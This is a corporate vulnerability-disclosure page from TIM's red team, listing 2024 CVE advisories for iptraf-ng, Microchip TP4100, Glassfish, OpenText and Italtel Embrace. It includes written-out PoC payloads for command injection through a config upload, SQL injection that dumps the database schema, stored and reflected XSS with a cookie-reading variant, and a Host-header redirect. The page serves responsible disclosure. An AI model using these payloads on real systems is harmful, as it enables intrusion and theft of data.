La sostenibilità per TIM

Bilancio di Sostenibilità 2023

Vogliamo contribuire ad accelerare la crescita sostenibile dell’economia e della società portando valore e benessere alle persone, alle aziende, alle istituzioni. Approfondisci

Ultimi Comunicati Stampa

Redazione ufficio stampa

Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati

Vulnerability Research & Advisor

Finalità e modalità operative

Nell’ambito delle attività di Cybersecurity di TIM, è stato costituito un gruppo di lavoro dedicato all’esecuzione di Security Assessment (Red Team), che si occupa di analizzare software sviluppato on-demand, software di mercato e firmware.

Tra gli obiettivi del team c’è quello di rilevare le vulnerabilità che un potenziale attaccante potrebbe sfruttare per eseguire degli attacchi informatici verso le infrastrutture di TIM ed evidenziarne gli impatti reali rilevati.

L’attività non si limita alla sola verifica delle vulnerabilità note, ma include un’attività di ricerca specifica con l’obiettivo di scoprire eventuali nuove vulnerabilità non ancora conosciute pubblicamente (vulnerabilità 0day).

Qualora vengano rilevate vulnerabilità 0day, si procede con una “divulgazione responsabile” verso il produttore del prodotto analizzato, comunicandogli prontamente e in via confidenziale le vulnerabilità scoperte, in modo che possa replicarle e produrre una contromisura (patch) entro 90 giorni dalla notifica ricevuta.

In seguito al rilascio della contromisura (patch), oppure trascorsi i 90 giorni dalla segnalazione, si procede alla pubblicazione, classificando le vulnerabilità sul Mitre (CVE, Common Vulnerabilities and Exposures).

Analoghe azioni vengono intraprese nell’ambito dei processi di Security Testing e Gestione Incidenti (Incident Handling) di TIM, qualora portino a scoprire vulnerabilità non ancora note al produttore e alla comunità.

CVE-2024-52949– iptraf-ng

Vulnerability Description: Stack-based Buffer Overflow - CWE-121

Software Version: 1.2.1

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-52949

CVSS:

Severity:

Credits: Massimiliano Ferraresi, Massimiliano Brolli

A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function). Buffer overflows often can be used to execute arbitrary

Step-by-step instructions and PoC

During an assessment we fuzzed the -C argument with AFL++ with the following command

sudo ./afl-fuzz -i /in -o /out -- ./iptraf-ng -C @@

The /in directory contains various types of playlists that AFL can fuzz and iterate over. After one day of fuzzing, we found 4 types of config that crash iptraf-ng. The issue consistently occurs in the strcpy function doesn’t control the size and is possible to overflow memory in the stack

The following evidence the line of vulnerability code:

Figure 1: /src/ifaces.c:70

Click to enlaarge

This is the overwritten EIP:

Figure 2: overwritten EIP

Click to enlarge

Below you can find an exploit, by way of it’s possible execute arbitrary code, and the relative payload it generates:

Figure 3: Exploit to execute arbitrary code

Click to enlarge

Figure 4: Payload

Click to enlarge

Inject the payload into -i argument:

Figure 5: Payload injection

Click to enlarge

Execute the shell:

Figure 6: Shell execution

Click to enalrge

Security Impact

An attacker can use a malicious configuration file to execute arbitrary code on the victim's program with root privilege.

CVE-2024-49351– IBM Workload Scheduler

Vulnerability Description: Plaintext Storage of a Password- CWE-256

Software Version: 9.5.0

NISThttps://nvd.nist.gov/vuln/detail/CVE-2024-49351

CVSS: 5.5

Severity: Medium

Credits: Alberto Arganese, Cristian Castrechini, Federico Draghelli, Massimiliano Brolli

An Improper Password Storage vulnerability exists in the connection properties panel under the Administration tab. This flaw allows authenticated remote attackers with administrator privileges to access and read the engine connection password in cleartext.

Security impact

Attackers who obtain this information can gain unauthorized access to sensitive systems, potentially escalating privileges and compromising data. This exposure can further enable lateral movement within the network, increasing the attack surface. Ultimately, it undermines the integrity of the entire system, leading to potential data breaches and reputational damage.

CVE-2024-9329 – Eclipse Glassfish

Vulnerability Description: Improper Handling of Parameters - CWE-233

Software Version: 7.0.15

NISThttps://nvd.nist.gov/vuln/detail/CVE-2024-9329

CVSS: 6.1

Severity: Medium

Credits: Marco Ventura, Claudia Bartolini, Andrea Carlo Maria Dattola, Debora Esposito, Massimiliano Brolli

The Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is '/management/domain'. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

Step-by-step instructions and PoC

The application presents an Open Redirect on the Host parameter, when the /management/domain endpoint is requested via an HTTP GET request.

Affected Endpoints

URL: https://[IP]:[PORT]/management/domain

HTTP Parameter: Host

Figure 1: Host parameter modified

Click To Enlarge

Below is the evidence with the vulnerability details and the payload used.

Figure 2: payload and evidence

Click To Enlarge

To perform this attack, the attacker does not need to be authenticated to the target application.

Security Impact

An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

CVE-2024-9054 – Microchip TP4100

Vulnerability Description: RCE on file configuration parameter - CWE-78

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9054

CVSS: 8.8

Severity: High

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The device doesn't correctly sanitize parameters content of the configuration file. An attacker able to upload a new configuration file could insert in the parameter 'secret_key' malicious bash commands that will be executed by the device.

Step-by-step instructions and PoC

A malicious user has got a configuration file or can download it from the device web GUI . This user could locally modify the content of this file because it is in cleartext. Specifically, a bash command could be inserted in a parameter (“shared_key”) present in the xml structure of the file. Once this file is loaded, after authentication, through the web GUI, the device executes the command inserted.

Affected Endpoints

URL: http://<device_IP>/config_restore

XML Parameter: secret_key

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

POST /config_restore HTTP/1.1

Host: <device_IP>

Cookie: ci_session=1b4e84dfb3a749723b333697870193996399758b

Content-Length: 206564

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Sec-Ch-Ua-Platform: "Linux"

Sec-Ch-Ua-Mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7riABGiPPkPZ3FY6

Accept: */*

Origin: https://<device_IP>

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https://<device_IP>/configbackuprestore

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=1, i

Connection: close

------WebKitFormBoundary7riABGiPPkPZ3FY6

Content-Disposition: form-data; name="file"; filename="tp4100_cfg1.txt"

Content-Type: text/plain

<?xml version="1.0"?>

……………………………………………………….

<server>

<ip><device_IP></ip>

<secret_key>`ping <LAN_client_IP> 49`</secret_key>

<timeout>3</timeout>

<auth_proto>PAP</auth_proto>

<port>49</port>

</server>

…………………………………………………………

 

This first step consists of obtaining (download it from the web GUI or having one) the configuration file. Then the content of the vulnerable parameter (i.e. “shared_key”) is modified with the bash command chosen:

`ping [LAN_client_IP] 49`

Figure 1: Modified Parameter

Click To Enlarge

Then the file is uploaded by using the web GUI and it is accepted by the device, see the picture below.

Figure 2: Uploading File

Click To Enlarge

Finally, in the following image is shown as the bash command is executed by the device because ICMP packets arrive to the [LAN_client_IP] chosen in the command itself:

Figure 3: RCE

Click To Enlarge

Security Impact

A malicious user with the access to the web GUI of the device could insert a bash command to construct a reverse shell to the device and to control it. Another situation could be represented by a malicious user that reaches the device network and knows the structure of the configuration file, that, through social engineering techniques, forces a user with access to the web GUI to load the infected file and to reach the same objective reported above.  

CVE-2024-7801 – Microchip TP4100

Vulnerability Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - CWE-89

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-7801

CVSS: 6.5

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

It is possible to perform an unauthenticated SQL injection request on the web resource 'get_chart_data' in the parameter 'channelId'. The device concatenates user input in the SQL query (SQLite) and execute it.

Step-by-step instructions and PoC

Affected Endpoints

·       URL: https://<device_IP>/get_chart_data

·       HTTP Parameter: channelId

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

POST //get_chart_data HTTP/1.1

Host: <device_IP>

Content-Length: 932

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Accept: application/json, text/javascript, */*; q=0.01

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Sec-Ch-Ua-Mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Sec-Ch-Ua-Platform: "Linux"

Origin: https://<device_IP>

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https://<device_IP>/perfmon_tenmhz_stat

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=1, i

Connection: close

metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=1_status%20UNION%20SELECT%20sqlite_version(),%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

A user, connected to the LAN of the device, can perform an unauthenticated request to the web resource ‘get_chart_data’. 

Below is the evidence with the vulnerability details and the payload used.

Figure 4: Unauthenticated Request

Click To Enlarge

The field ‘channelId’ in the body of the POST request is vulnerable to a SQL injection attack. The injected SQL code in this field isn’t sanitized and executed on the device. Then it is possible for an attacker to retrieve information such as SQL version of the DB and tables content. In the image below the payload used for reading the SQL version is the following:

1_status%20UNION%20SELECT%20sqlite_version(),%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%20

68%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

Figure 5: Sql Injection

Click To Enlarge

In the following image the payload used to extract the structure of the DB is:

1_status%20UNION%20SELECT%20sql,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master%20WHERE%20type=’table’%20LIMIT%201%20OFFSET%200--%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

Figure 6: DB Structure

Click To Enlarge

Security Impact

A malicious user connected to the LAN of the device without privileges could access sensitive information in the Database of the device itself.

CVE-2024-6360 – OpenText Vertica Management Console

Vulnerability Description: Incorrect Permission Assignment for Critical Resource – CWE-732

Software Version: 10.1.0

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-6360

CVSS:

Severity:

Credits: Davide Brian Di Campi, Massimiliano Brolli

 

The product creates, stores, and uses hard-coded plaintext keys that are needed for authorization when calling protected APIs

Security Impact

Incorrect Permission Assignment for Critical Resource vulnerability in OpenText™ Vertica could allow Privilege Abuse and result in unauthorized access or privileges to Vertica agent apikey. This issue affects Vertica: from 10.0 through 10.X, from 11.0 through 11.X, from 12.0 through 12.X, from 23.0 through 23.X, from 24.0 through 24.X.

CVE-2024-5532 – OpenText™ Operations Agent

Vulnerability Description: Cross Site Scripting Stored - CWE-79

Software Version: 12.20, 12.21, 12.22, 12.23, 12.24, 12.25, 12.26

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-5532

CVSS:

Severity:

Credits: Marco Ventura, Claudia Bartolini, Massimiliano Brolli

In OpenText™ Operations Agent, version 12.20, 12.21, 12.22, 12.23, 12.24, 12.25 and 12.26, is possible to perform Cross-site scripting Stored attacks. This vulnerability allows an attacker to compromise the interactions that users have with the vulnerable application. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

Step-by-step instructions and PoC

A remote user that has the permissions to modify the agent configuration file, can perform Cross-site scripting Stored attacks. In particular, by adding a malicious payload within the CORE_ID value, the attacker can inject an arbitrary javascript code in the HTML page.

Affected Endpoints

•           URL:

–          http://[IP]:[PORT]/Hewlett-Packard/OpenView/BBC/ovrg?html

–          http://[IP]:[PORT]/Hewlett-Packard/OpenView/BBC/services?html

–          http://[IP]:[PORT]/Hewlett-Packard/OpenView/BBC/ping?html

–          http://[IP]:[PORT]/Hewlett-Packard/OpenView/BBC/status?html

•           Vulnerable configuration parameter: CORE_ID

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

Figure 1: set vulnerable parameter

Click To Enlarge

This first step consist of change the CORE_ID agent configuration parameter, by adding the “img” HTML tag, as reported previously. 

Figure 2- Cross-site Scripting Stored execution

Click To Enlarge

Security Impact

An attacker is able to compromise the interactions that users have with the vulnerable application.

CVE-2024-43687 – Microchip TP4100

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687

CVSS: 6.1

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The field "Custom Banner" in tab "Banner config" has been found vulnerable to stored cross-site scripting (XSS) attacks. The script injected is executed by the browser when a user visits the banner page. This type of XSS is particularly dangerous because the malicious code is saved by the device and the commands are executed for any user that loads the page, until the device is reset.

 

Step-by-step instructions and PoC

A user, authenticated to the web application, can insert javascript code in the banner configuration.

Affected Endpoints

•                URL: http://<device_IP>/bannerconfig

•                HTTP Parameter: txtcustom

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

POST /bannerconfig HTTP/1.1

Host: <device_IP>

Cookie: ci_session=2e5d6db87cf9104d4b8bfd4951665c2b96fffc24

Content-Length: 477

Cache-Control: max-age=0

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Linux"

Upgrade-Insecure-Requests: 1

Origin: https://<device_IP>

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryayaMItq0sXj5hiI2

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: https://<device_IP>/bannerconfig

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=0, i

Connection: close

 

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="user_level"

 

1

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="bannerradio"

 

CUSTOMIZED

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="txtcustom"

 

<svg onload=alert(1000000)>

 

------WebKitFormBoundaryayaMItq0sXj5hiI2

Content-Disposition: form-data; name="action"

 

applybanner

------WebKitFormBoundaryayaMItq0sXj5hiI2—

 

After logging, go to the panel ‘Admin’ -> ‘Banner Config’. Select ‘Custom Banner’ and insert the following javascript payload:

        <svg onload=alert(1000000)>

Figure 7: Add javascript payload

Click To Enlarge

Then click ‘Apply’. Finally, the javascript code is executed in the banner page at ‘https://<device_IP>’

Figure 8: Stored Cross-site Scripting

Click To Enlarge

Security Impact

By using malicious javascript code the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. The attacker could: transfer private information from the victim's machine to the attacker, send malicious requests to a web site on behalf of the victim.

CVE-2024-43686 – Microchip TP4100

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43686

CVSS: 6.1

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

It is possible to perform a Reflected XSS attack by inserting in the parameter 'channelId' of the POST request 'get_chart_data' a malicious javascript code.

Step-by-step instructions and PoC

An unauthenticated user can insert javascript code in field ‘channelId’ for the POST request to the web resource ‘get_chart_data’.

Affected Endpoints

•                URL: http://<device_IP>/get_chart_data

•                HTTP Parameter: channelId

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

POST //get_chart_data HTTP/1.1

Host: <device_IP>

Content-Length: 102

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Accept: application/json, text/javascript, */*; q=0.01

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Sec-Ch-Ua-Mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Sec-Ch-Ua-Platform: "Linux"

Origin: https:// <device_IP>

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https:// <device_IP>/perfmon_t1e1_stat

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=1, i

Connection: close

metric=mtie_a&xRange=1&tStart=-1&channelName=span&channelId=1%3cscript%3ealert(1000)%3c%2fscript%3easd

An unauthenticated user can send a POST request to the web resource ‘get_chart_data’ and insert the following URL encoded javascript payload:

1%3cscript%3ealert(1000)%3c%2fscript%3easd

Figure 9: Add URL encoded javascript payload

Click To Enlarge

Then the javascript code is executed in the page at ‘https://<device_IP>/get_chart_data’

Figure 10: Reflected XSS

Click To Enlarge

Security Impact

By using malicious javascript code the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. The attacker could: transfer private information from the victim's machine to the attacker, send malicious requests to a web site on behalf of the victim.

CVE-2024-43685 – Microchip TP4100

Vulnerability Description: Improper Authentication – CWE-287

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43685

CVSS: 9.8

Severity: Critical

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The device provides a new cookie 'ci_session' before the login. This coookie will be used in the post login session. An attacker able to obtain the cookie before the login, could use it to hijack the session.

 

Step-by-step instructions and PoC

The attack consists of obtaining a valid session token, inducing a user to authenticate himself with that session token, and then hijacking the user-validated session by the knowledge of the used session token.

Below are the evidences with the vulnerability details and the payloads used.

An authenticated user performs the logout operation.

Figure 11: Logout

Click To Enlarge

The user is redirect to the login page and the new token is obtained.

Figure 12: Get new token

Click To Enlarge

Then the new session token is used for the subsequent login.

Figure 13: Subsequent login by new session token

Click To Enlarge

This token could be captured and used by the attacker.

Moreover, it is possible for an attacker to create a cookie with a chosen value (N.B. this value must have the same length as the original one) performing a request for an unauthenticated resource (e.g. topbardata).

Figure 14: Cookies creation

Click To Enlarge

Then the real user has to login by using the created token.

Figure 15: Real user logs in by fake cookies

Click To Enlarge

As showed in the next picture the token is used in the user session.

Figure 16: Fake token in the user session

Click To Enlarge

Finally, the attacker could exploit the created token to access the application without knowing the credentials (e.g. access to the dashboard).

Figure 17: Fake token exploitation

Click To Enlarge

Security Impact

The Session Fixation attack fixes an established session on the victim’s browser, so the attack starts before the user logs in. As matter of fact an attacker could access and use the web application without knowing the credentials.

CVE-2024-43684 – Microchip TP4100

Vulnerability Description: Cross-Site Request Forgery (CSRF)– CWE-352

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43684

CVSS: 8.8

Severity: High

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The device does not implement an Anti-CSRF token to protect the device against potential cross site request forgery attack.

 

Step-by-step instructions and PoC

Below are the evidences with the vulnerability details and the payloads used.

The device doesn’t implement protection against Cross-Site Request Forgery (CSRF). The user could be tricked by an attacker into making an unintentional request to the web server which will be treated as an authentic request. Here the PoC used to trick the user: the message showed in the banner will be changed into ‘CSRFATTACK’.

Figure 18: Banner html

Click To Enlarge

After the user submit the request using the PoC, the banner is actually changed.

Figure 19: Banner

Click To Enlarge

Security Impact

An attacker could effectively perform any operations as the victim. These may include: obtaining complete control over the web application, deleting or stealing data. Because the attacker has the identity of the victim, the scope of CSRF is limited only by the victim's privileges.

CVE-2024-43683 – Microchip TP4100

Vulnerability Description: URL Redirection to Untrusted Site ('Open Redirect') – CWE-601

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43683

CVSS: 6.1

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The device does not properly verify the "Host" header field contained in GET/POST requests. In the attached evidences, the legit 'Host' field is replaced with the public name of another host (in this case pentester.com) and the requests are accepted by the device that redirect to malicious page.

 

Step-by-step instructions and PoC

Without validation of header Host is possible to redirect a user to malicious website owned by the attacker.

Below the evidence with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

 

GET /dashboard HTTP/1.1

Host: pentester.com

Cache-Control: max-age=0

Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Linux"

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Priority: u=0, i

Connection: close

 

In the following picture the header host is modified with a domain owned by the attacker (i.e. pentester.com) and the device redirect the user to the website. 

Figure 20: URL Redirection to Untrusted Site

Click To Enlarge

Security Impact

A user could be redirected to malicious website and the attacker could steal sensitive information such user credentials.

CVE-2024-34399 – BMC Remedy Mid Tier

Vulnerability Description: Improper Authentication - CWE-287

Software Version: 7.6.04

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-34399

CVSS:

Severity:

Credits: Gabriele Duchi, Marco Ventura, Giulio Pellegrini, Massimiliano Brolli

** UNSUPPORTED WHEN ASSIGNED ** 
An issue was discovered in BMC Remedy Mid Tier 7.6.04. An unauthenticated remote attacker is able to access any user account without using any password.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer and the impacted version for this vulnerability is 7.6.04 only.

Security Impact

By exploiting this vulnerability, an unauthenticated remote attacker can access any user account without using any password.

CVE-2024-31847 – Italtel Embrace

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Stored Cross-site Scripting') - CWE-79

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31847

CVSSv3: 6.1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

Stored Cross-site scripting (XSS) vulnerability allows authenticated and unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflects/store the user input without sanitization.

 

Step-by-step instructions and PoC

The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by the stored type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to inject arbitrary javascript code which is then reflected in the Activity Log page of the application. The attack can be performed both pre and post authentication.

Below are the evidences with the vulnerability details and the payloads used.

The below payload is an example. The vulnerability can be exploited using every functionality which generates a log entry in the ActivityLog page of the web application

URL: https://[HOST]/[NODE-NAME]/supervoip/api/v1/logTrace/buttonViewLogTrace/[ANY-STRING]/<img%20src=x%20onerror=alert(document.cookie"))>/it

Payload used to exploit the vulnerability:

Figure 1 - Payload

Click To Enlarge

Figure 2 - XSS Stored

Click To Enlarge

Figure 3 - XSS Stored

Click To Enlarge

Security Impact

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

CVE-2024-31846 – Italtel Embrace

Vulnerability Description: Improper Access Control – CWE-284

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31846

CVSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The web application does not restrict or incorrectly restricts access to a resource from an unauthorized actor.

 

Step-by-step instructions and PoC

Any user without authentication can view data about the client registered to the application. This vulnerability can be exploited in order to gather personal information like phone numbers and emails and can be exploited without authentication.

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/supervoip/api/v1/register/[PHONE-NUMBER]/[ANY-STRING]/[ANY-STRING]/it?columns%5B13%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B13%5D%5Bsearch%5D%5Bregex%5D=false&order%5B0%5D%5Bcolumn%5D=0&order%5B0%5D%5Bdir%5D=asc&start=0&length=10&search%5Bvalue%5D=&search%5Bregex%5D=false

Figure 5.1 - Payload

Click To Enlarge

Figure 5.2 - Improper Access Control

Click To Enlarge

Security Impact

By exploiting this vulnerability on the web application, it was possible to have unauthorized access to personal information about registered clients.

Remediation Steps

Ensure proper authorization level controls of a user requesting access to particular endpoints.

CVE-2024-31845 – Italtel Embrace

Vulnerability Description: Improper Output Neutralization for Logs - CWE-117

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31845

CVSSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The product does not neutralize or incorrectly neutralizes output that is written to logs.

 

Step-by-step instructions and PoC

 

The web application writes logs using a GET query string parameter. This parameter can be modified by an attacker, so that every action he performs is attributed to a different user. This vulnerability can be exploited without authentication.

Below are the evidences with the vulnerability details and the payloads used.

The below payload is an example. The vulnerability can be exploited using every functionality which generates a log entry in the ActivityLog page of the web application.

Figure 1 - Payload

Click To Enlarge

Figure 2 - Log Forging

Click To Enlarge

Figure 3 - Log Forging

Click To Enlarge

Security Impact

An attacker can insert fake log entries and execute malicious actions that will be attributed to other users.

CVE-2024-31844 – Italtel Embrace

Vulnerability Description: Generation of Error Message Containing Sensitive Information - CWE-209

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31844

CVSSv3: 5.3

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The server does not properly handle application errors. In some cases, this leads to a disclosure of information about the server.

 

Step-by-step instructions and PoC

 

An unauthenticated user is able craft specific requests in order to make the application generate an error. Inside this error, some information about the server is revealed, like the absolute path of the source code of the application. This kind of information can help an attacker to perform other attacks against the system. This vulnerability can be exploited without authentication.

Below are the evidences with the vulnerability details and the payloads used.

